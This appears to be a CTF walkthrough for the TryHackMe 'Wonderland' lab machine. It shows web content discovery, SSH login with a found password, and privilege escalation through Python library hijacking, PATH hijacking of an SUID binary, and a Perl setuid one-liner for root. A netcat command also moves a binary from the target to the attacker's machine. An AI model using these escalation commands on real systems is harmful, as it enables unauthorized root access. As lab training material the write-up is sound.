CTF Walkthroughs, TryHackMe

TryHackMe – Wonderland Walkthrough

Introduction

This was an easy Linux machine that involved performing content discovery against a web application to identify the SSH password of a user to obtain initial access and exploit various vulnerable Linux binary to escalate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has identified two open ports: port 22 (SSH) and port 80 (HTTP), so the next step will be to start enumerating HTTP.

Enumerating HTTP

When accessing the site through a web browser, the following page is displayed:

The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate
  • -t to specify the number of concurrent threads

The scan has found a /r/ entry, when navigating to it the following page is displayed:

This probably means further content discovery has to be performed, when scanning for directories within the /r entry, a new /a directory is found:

The /r/a/ directory takes to the following page:

The next one found using Gobuster is /b:

Since the first page mentioned “Rabbit”, trying to /r/a/b/b/i/t/:

When inspecting the source code of the page, what looks like a password for the alice user is found:

Using the credentials found above to authenticate via SSH:

The hint for this room mentions things are upside down, and in fact it appears the root flag is in Alice’s home directory:

The user flag appears to be in the /root/ directory:

Privilege Escalation

When using sudo -l, it appears that the alice user can execute /home/alice/walrus_and_the_carpenter.py as the rabbit user:

The script has a poem and it prints 10 random phrases from it randomly when executed. Since the random library is being used Python Library Hijacking could be used to exploit this misconfiguration, by creating a random.py file and let the script execute that instead of the actual random.py Python library.

alice@wonderland:~$ cat
walrus_and_the_carpenter.p
y
import
rando
m
poem = """The sun was shining on the
se
a,
Shining with all his
<SNIPPED>
They wept like anything to
se
e
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"
for i in range(10):
line = random.choice(poem.split("\n"))
print("The line was:\t", line)

Creating a random.py script to execute Bash that will be executed when the “walrus_and_the_carpenter.py” script is run:

Upon running the script as the rabbit user, the access is changed accordingly:

Rabbit’s home directory contains an SUID binary called teaParty:

By using ltrace against it it seems it is just printing some strings:

Using Netcat to transfer to binary to the local Kali machine for further investigation:

# on the target host
nc 10.9.228.20 4444 < teaParty
# on the local host
nc -lvnp 4444 > teaParty

The script appears to be using the date binary, although it does not seem to be using an absolute path, so this can be exploited by creating an arbitrary “date” executable and modifying the PATH environment path so that the script will execute the malicious date script instead of the original one.

Navigating to the /tmp directory and adding it to the environmental path:

Creating a Bash script that will create a SUID copy of the /bin/bash binary:

After executing the teaParty binary, it has created the SUID Bash binary, which when run with the -p flag (which allows to execute binaries as the owner of it), access as the hatter user is obtained:

There seems to be a password.txt file in hatter’s home directory, which contains the password for this user:

Transferring the LinPEAS enumeration script using the Python Simple HTTP Server and Wget:

Running the script:

It appears that Perl has capabilities enabled:

According to GTFOBins, these can be exploited by manipulating the process UID, therefore executing Perl code as root:

Executing the command specified in GTFOBins:

/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'

This has granted root-level access to the remote host.

Conclusion

I found the initial phase of this machine rather boring and unrealistic, although the privilege escalation process was really interesting and fun to exploit.